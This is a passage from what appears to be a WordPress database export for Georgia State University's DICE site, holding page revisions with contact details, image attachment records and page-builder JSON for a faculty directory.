<!---->\n                <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-399 style-local-185-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-399 style-local-185-c5\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">DICE</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c6\" class=\"h-global-transition-all h-heading style-400 style-local-185-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-400 style-local-185-c6\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Contact Us</h2>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c7\" class=\"h-text h-text-component style-401 style-local-185-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus.&nbsp;</p>\n                    <p>Phone:&nbsp;(404) 919-0757\n                      <br>Email: dice@cs.gsu.edu</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c21-outer\">\n            <div data-colibri-id=\"185-c21\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c21 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-17 21:06:42','2022-03-18 01:06:42','',185,'https://gsudice.dataconn.net/?p=547',0,'revision','',0),(553,1,'2022-03-17 21:07:30','2022-03-18 01:07:30','','pawel-czerwinski--0xCCPIbl3M-unsplash','','inherit','open','closed','','pawel-czerwinski-0xccpibl3m-unsplash','','','2022-03-17 21:07:30','2022-03-18 01:07:30','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/pawel-czerwinski-0xCCPIbl3M-unsplash.jpg',0,'attachment','image/jpeg',0),(554,1,'2022-03-17 21:07:50','2022-03-18 01:07:50','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-pawel-czerwinski-0xCCPIbl3M-unsplash-scaled-1.jpg','cropped-pawel-czerwinski-0xCCPIbl3M-unsplash-scaled-1.jpg','','inherit','open','closed','','cropped-pawel-czerwinski-0xccpibl3m-unsplash-scaled-1-jpg','','','2022-03-17 21:07:50','2022-03-18 01:07:50','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-pawel-czerwinski-0xCCPIbl3M-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(555,1,'2022-03-17 21:07:54','2022-03-18 01:07:54','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":399,\"type\":\"content\",\"props\":{\"content\":\"DICE\"}},{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c7\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus.&nbsp;<\\/p><p>Phone:&nbsp;(404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c21\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-03-17 21:07:54','2022-03-18 01:07:54','',546,'https://gsudice.dataconn.net/?p=555',0,'revision','',0),(556,1,'2022-03-17 21:07:54','2022-03-18 01:07:54','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n            <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-399 style-local-185-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-399 style-local-185-c5\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">DICE</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c6\" class=\"h-global-transition-all h-heading style-400 style-local-185-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-400 style-local-185-c6\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Contact Us</h2>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c7\" class=\"h-text h-text-component style-401 style-local-185-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus.&nbsp;</p>\n                    <p>Phone:&nbsp;(404) 919-0757\n                      <br>Email: dice@cs.gsu.edu</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c21-outer\">\n            <div data-colibri-id=\"185-c21\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c21 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-17 21:07:54','2022-03-18 01:07:54','',185,'https://gsudice.dataconn.net/?p=556',0,'revision','',0),(562,1,'2022-03-17 21:10:48','2022-03-18 01:10:48','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate 